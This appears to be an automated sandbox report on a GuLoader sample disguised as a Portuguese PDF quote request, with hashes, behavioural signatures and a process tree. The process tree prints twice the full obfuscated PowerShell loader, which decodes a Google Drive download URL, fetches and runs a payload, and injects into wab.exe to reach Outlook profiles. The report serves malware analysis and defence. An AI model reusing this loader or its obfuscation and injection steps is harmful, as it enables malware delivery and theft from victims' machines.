Analysis
-
max time kernel
146s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
21/03/2024, 17:07
Static task
static1
Behavioral task
behavioral1
Sample
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
Resource
win10v2004-20240226-en
General
-
Target
Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs
-
Size
20KB
-
MD5
6c172c78edfa9cf3fbcee9e6417b4ec0
-
SHA1
56d554a6cfae0cbee45a32ac9e7f261c910cd046
-
SHA256
18a00a0da74be3d89a29bd856617a1703ee83646f39a51d70cf9d9017bd1ffad
-
SHA512
881216852a4049ce32387b221791b9ba7c75c4decb9b869430842a7a540f52ec1a24ae9a41550e0feb0dcf58731dcdd2dda9bcd45c798e0403af0fefaa751c27
-
SSDEEP
384:CE68ihBTZ6i8ahvxSIp27nn15lNmpK2kn70Vuz3+44GE8gT:H68ihdgi/LfIn3lNmpK2k7Sau4m8M
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 2 drive.google.com 3 drive.google.com 8 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 900 wab.exe 900 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2076 powershell.exe 900 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2076 set thread context of 900 2076 powershell.exe 34 -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1712 powershell.exe 2076 powershell.exe 2076 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeDebugPrivilege 900 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 1968 wrote to memory of 1712 1968 WScript.exe 28 PID 1968 wrote to memory of 1712 1968 WScript.exe 28 PID 1968 wrote to memory of 1712 1968 WScript.exe 28 PID 1712 wrote to memory of 2360 1712 powershell.exe 30 PID 1712 wrote to memory of 2360 1712 powershell.exe 30 PID 1712 wrote to memory of 2360 1712 powershell.exe 30 PID 1712 wrote to memory of 2076 1712 powershell.exe 32 PID 1712 wrote to memory of 2076 1712 powershell.exe 32 PID 1712 wrote to memory of 2076 1712 powershell.exe 32 PID 1712 wrote to memory of 2076 1712 powershell.exe 32 PID 2076 wrote to memory of 928 2076 powershell.exe 33 PID 2076 wrote to memory of 928 2076 powershell.exe 33 PID 2076 wrote to memory of 928 2076 powershell.exe 33 PID 2076 wrote to memory of 928 2076 powershell.exe 33 PID 2076 wrote to memory of 900 2076 powershell.exe 34 PID 2076 wrote to memory of 900 2076 powershell.exe 34 PID 2076 wrote to memory of 900 2076 powershell.exe 34 PID 2076 wrote to memory of 900 2076 powershell.exe 34 PID 2076 wrote to memory of 900 2076 powershell.exe 34 PID 2076 wrote to memory of 900 2076 powershell.exe 34 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Orçamento (ISGP) EU - 0605PT·pdf.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:2360
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Adgangsbegrnsnings Festoonery Overmost Inned Bondeknolde slaggebetonen #>;$Shunterne=(cmd /c set /A 115^^0);Function Rebribe ([String]$Snvreres){$Shunterne=[char][int]$Shunterne;$Exemplificational=$Shunterne+'ubstring';$Subpoenas=8;$Aromatiser=Audiles($Snvreres);For($Sagginess=7; $Sagginess -lt $Aromatiser; $Sagginess+=$Subpoenas){$Inrunning=$Snvreres.$Exemplificational.Invoke($Sagginess, 1);$Airbuses=$Airbuses+$Inrunning;}$Airbuses;}function Unscouring ($Descendent){. ($Phanerophyte) ($Descendent);}function Audiles ([String]$Kvindesynenes){$Stvstormene=$Kvindesynenes.Length-1;$Stvstormene;}$Bryanite=Rebribe 'GovernmTTilve erStagedmam disten MarginskubistefVllingseVandlbsrFerrihyr Bu,zeeiVandfornSuper,lgProfess ';$Twitchfire=Rebribe 'Sur,acthFlybooktE.tingutFis eripgranulisMicrolu: alaeot/Submax / Flle.kdFlygtn rBedeafpi Dor.thvTewlybleWobblyb.TvtninggVerdslio TidobloBlanktegBoks.bolDrukneteBefolkn.BrshandcGemytteo HairbamEtageby/ yrstehuDydspr,c Softba?ExcisioeFr.mhvexlubberlpEnliefsoDyknde.r,undayptSkattek=OvertrddCursthooNaturskwBejl.rtnlettermlBiradiaoKontoraaMajoritdSpil.ev&Bkkenfoi adver,dSeptem,=posn,rp1,nerler6 Wholese.atocri_churchwaDkketalPGraaligdAnnoncehF,rnticY Checkr1WhallocfskviserI ProfitNdejligtz MaattecPast amvCalpurndGinslinhUncathozOmstndee TheomadSilhu,tXnonvacuy Perfec2 Trustbuh.gmollYRepulsi6TringenmE iminaSTerm.nuP PromusrP.rotidWBioassaZFlannel ';$Phanerophyte=Rebribe 'OvermigiCentriseOutissuxFontane ';$Laureateships=Rebribe 'Fecundi$HydrospgPsil,selMoraviaoLrestnibGenlsunaSmigr,rlVer abi:LymphoiKshuddereOdelstinOphthaldBuffedetSpeak,te Ddsboe Anledn,=Microsc KaleyarSMenorrhtturpethaHeterolr sephirtMrtelv.-Ballfi.B Smokili AnsvartC,aracisSelvbioTChannelrnonimpeaUnconson Tel.trsFascinaf Rum.eneMonophor Stigm Bryll -PensionS P.openoRat kseu flytbrskrfe scGlyceroeResurfa Opinion$AfterfrTParafrawTripalmiShieldbtGall unc wastewhVasor ff ,ystemiF,refinrFlopslaeAfskyen C okery- DomsudDReflecte Climats SkosnutAmylcoui Bi,tannFinmekaaUntr.sttAttribriGowdnooo ErgotinLagerad Hit,anr$svrdsidU uitaren Insoc eIn,brinxWrithe tEksekutrEnam eraNa,rvaeomajon,er MalknidNervatiiwinegronTekstilaWarmersrImmanenyGiglots ';Unscouring (Rebribe ' B rrer$N,reocyg Lourd lStoppaboSpookinbFredso,a cosmoplbackfis:BafflemURetrodanBehovsueOphthalxOrdningtQa idamrSkinnebaLydredioStationrPolygamdAceto ui Aho,nsnSv,nglaa SimultrLedde.syroopbob= Takedo$SperonaePrecipinD.eriyov Padash: TawgikaSki,reepVaskepupKodificdVvskultaConvergtStrrelsa.emonet ') ;Unscouring (Rebribe 'nednormIpulpitimmacrocepCeral,ro irehnrindrejstSte han-Jack,olMUn ffraoSnorelodAustralufretfullIor opae Redecl ZarsvetB Ga,deniSculkintFupperns ,osereTRegaugircommuniaWarningnWommeras AllotyfStepnineUneffacrnonpro. ') ;$Unextraordinary=$Unextraordinary+'\Postmodernismen.Dis' ;Unscouring (Rebribe 'Syn ary$Ble eplg frumpilDe,lexio Unquicb Caliv.aTopvinkl Sinkni: SpindpDKons.kvi,unhmetsMari,olkSnrlivef nderpriSkrmreflFiskeli=Fireaar( ConcubTOpbringe Misbe sPrecritt Kamufl-AfsnitsPCorrodyaProteset ThermihGrenen, Politis$FladpulUCatapuln phthaleNiveaufxStorhertRetsf rrClowty,aAntiksao estlagrAlternedContextiAt mizenD,clariaBrss inrBortaukyAllival) En,our ') ;while (-not $Diskfil) {Unscouring (Rebribe ' Al.aynI Rne,olf Nondis M.lieub(Murbrok$ Jom ruKThi.cyaeAt ogennU drenddDemesnitZagsagueBrygsov.tre,varJTri unioKainitebPaas,ebS Makho,tEnsandaa Tonn,stDvrg,ksePar.ren provoke-VaskulreSpitstiq,aadene S,erona$SignoraB HelsefrLazarocyMohmbira zoransnInterpiiThall.ptUr.stifeLeptopr) Modici Famulus{ PrimrkSRackwortPerceptaMultiturGammel t Morato- GrosseSDefecatlHandlepePrede ieMorm.nspBug.ene Deducer1Genglde}TranspiePretranlJuntowes ConvereCymbalo{O.fensiSMumiesit Quer sa BrugerrEmmeryptlymphat-AabentvSSmaabrnlMacrocleParaplaeHrdstubpD,nkort gallinu1Bibacio;FavnfulUVreel.nnTi.smags,kibsliccitatiooWoodlanuUdpenslrKlkedesi ExponenPseudo,gProsili Perc ss$ed maspL Halvfja UnwinduSalu,ter Stetose Aylessa CapsultFlumme eEvigeafsPer phehFrigresiAch,llipKato ess.tropha} Skaktp ');Unscouring (Rebribe 'Stabelv$EternisgUdenlanlWitchesoIndgnedbTe,foldaOejentrlOv.rnat:PaspoleD Un.ecoiMentorssFulgentkPro,enifUnconceiVentri lStt,esy=Spi.alt( photomT Tee ieeUdpegelsTrus futBredbaa-Fastho,P TunganaReform.tSkolepahMorinud Noncont$DgenigtU recentn EilerteisotrimxDolorsht DolichrFor.attasilke.ooReaktiorUinitiadSaftfuliD,schronPostcosaVet,rinrmirthfuybenzogl)Hinande ') ;}Unscouring (Rebribe ' ,armsd$CyaninsgKdebrkelApprestoForttnib Llingea,piritulJocasta:Lskbel,F Nonwaxo Uns,ncrIsoseisrDecimale.xpertitFursto,nBran.ekisemifunnHui,ilegSvrdfstsTffelhenAksonomaxeromyrvBemandinAfhstensPassere Rst.ner=Bent.ic Bari.eiGAssyrereForsrgetUnovert-Reab,orCVisualioUr.acidnClarititDatabase .udiolnSchleict Ehlers Campoo$Op,akniU Pletson BloknieBiovaskxArkfdertF,lernerInitiataGrundtaoDoublecr BeskridHotelisi M,soponAloe ora.yjamaer Keba,sy Antipo ');Unscouring (Rebribe 'Tornebu$bogka ngTorturklAngola,o BrokfubOvergreaIterdrilImmig a:SumpbveFVelopmea pavonesSemi.rotAk,demil.oazervaHulmurseT.kredsgS bdruigTenpenceTraumatlTegnes,s Con.ige Co.sue Parring=Trkbasu ornatfo[Me iturS MiljfoyP nonces Indv itMischoseF.skemem ,landb.NormereCRooferso StyninnNonwrinvChinanteCinquefrBacteritB,trykk].undeck:Deponer:OedelaeFragtopsrOrdmello CheckhmF,skekuBRom,ossaStttepesR.ghthae snings6,isting4CiliussSTalliabt C.mengrPaleopsiSoftnern Uninteg Eutrop(Gascony$Datas iFL,venssoPiersarrImpersorsemisucebrenthjtEsk.drenKurve,eiMicroconEftervigUranbersHusarrenGadarenaHandelsvskaberen,alycansFritids) Pul.it ');Unscouring (Rebribe 'Arealer$Hyposcog Nonp,sl Sy.ehjoCartagebBarium a Afls,elJarbotf:DejklumVShopsskeJoshuahjB.ckersoPrsi.ervEgenhndeProaviarDecentrsAfbalankInstrukrChondroiamb.tionFie,dfigVen.ric Editore= Un.orr Rea to[ BjergnSv.siculy Windows.kvareltBe.gowneblokninmNonperc.ManslayTablative Dus efxcoranoctPornoma. Aa ekrE LinieanKvindesc PolyanoStrasbod.fskalliPhosphanAssurang andoo] Fungol:.yrilli: TredelA.ilbageSContrasCPsilotaI y.rerbISuspici.HudfletGKobberse Afsagtt Dine.eSHjlpemet F rkear UnderpiStaklesnGuarapog Skol,n(ned,mpe$VaselinFMegaloeaEncomicsIndogentArtificlZoolatraAfrmnineContempg TrotregtrencheeMaterialtetraiosSissieseAmtmanp) Bashjt ');Unscouring (Rebribe ' Selska$Dodec,hgFeriernl.ulfonaoUntransbTightkoaalabamil,pillen: VsentlUColludenMetacisdMegafoneStence.rFletfunfA.titheoJanisarr BeldamtExecutiiActivisflabor.eyUnchivai ngrebnFoss,tegUnretur=Epinici$KinetonV Contr,eBun,renjShinerroSomnilovDestille UnbarbrBevislisM.smerikBe,ismar VkstceiLeaklesn Tal engAntimec.PressrusAretalouForflgebBoghandsFeinschtBjrnetjr TabeloiAnbringnsubu,bagF.rjage(Steffan3Bactris3Conduce5Casefu 4.eshear7 Stregs8decimal,Plurilo3Baiki,c1 Overta6Cytostr7Planesh9 ,rille)Rheumat ');Unscouring $Underfortifying;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:928
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:900
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5041f23af7d4457cc0ad5615db4d8d411
SHA159f348256c70326a68a5a0e8139ca540da6deb4c
SHA256925889eb90023a8601cf340b7416fc8153d3bcc11ce2f3ecb40b32ea6a879742
SHA512e66b94dc0e28a8d65c402eb8def85e24b8fdda9071e1c87a002ba22c0427455e5b99c6c336108d45e177ec768576ce5ed1188fef42fa186c3b6b7836912018e0
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
468B
MD525ce7b393f49c7c35fc9bda0bc9fb915
SHA140038b21a508106fa528d4be80e5c67094014502
SHA25659f4a91d276667fc04bf0021882e310d0ec64daf827df1cb987ebaf9b858d3de
SHA512bc43eb4c04da3106f21a37d637337a0233bbf65419a4c528fe9cfe82db52a6b85f7d99a966a0564d399a2de8c2bf75f4a4bdf83ed5e00958c5ba7a90881e5014
-
Filesize
4KB
MD550dd413bec30f0e90580cab4ead43871
SHA19323a2fffa9292219b75a826390a4b9a92ddc9c5
SHA256910062babe14c2a8f72bbd65eb2424b7f5eb62d12722b4aa32985d07ff4a4ddf
SHA5129deae5305ab9a902511696acf882c9c29d968de6c25607dfb86151ebeb2a8ffe8049cba10ed9723f0521bc88df72aa1e597501779ffc14a82c9b0918ca549190
-
Filesize
748B
MD5074dc4bc79f77cda3cbd467980d6ed1d
SHA13ec35f6d8859aae74969093551aaa8a426b20844
SHA2566ae66e8a1cfe1b489fa6165350027a6d2e4bf3ac87d49fc66d6a43de2bcd7fde
SHA5126d8e44d82e817e87a4d43b9625555beb77a465e07c575dca131e628ebfddd9ad657eb57c50d86cfee98beff1ba97dd8da9515347cdedb6998d6ef78cda812826
-
Filesize
2KB
MD56a865d731fc3f1c152f884e5e1df9588
SHA14cfb4908e6548a350d7d14639507a21a54a212e2
SHA256f12e0eebbf69e71d91e8f9ed17fd5f225520c58b61f3de7116de60668f9e7fe2
SHA51261e27ff3686179f45ad0e06e1875c2fc3ec5973cf7ed248936e09471d2eb427c26c00ef6dc5a78e7e831460508ffb8563a5807bfd3f2bc444498e168d34bc666
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2297530677-1229052932-2803917579-1000\0f5007522459c86e95ffcc62f32308f1_63be8c66-23f0-4400-84bb-c1a439222555
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YL3K1WDEVXVYMXV84ERM.temp
Filesize7KB
MD54a286405fae162fb819820012bd51389
SHA166db4e7cfc28b332a662a14e1667a282117f04ba
SHA2563bb59c15eb5b5328861b21d52ab388678d2b405e4e75c6ef061a5c4148b3494c
SHA512b8617f2dafff8ce9e1a25cf71a459523706092ca653a534222070c55894266a4607abe395d1784bebbdbf01f19f624e188a35c6e8d25c39eef79efa30fa33c19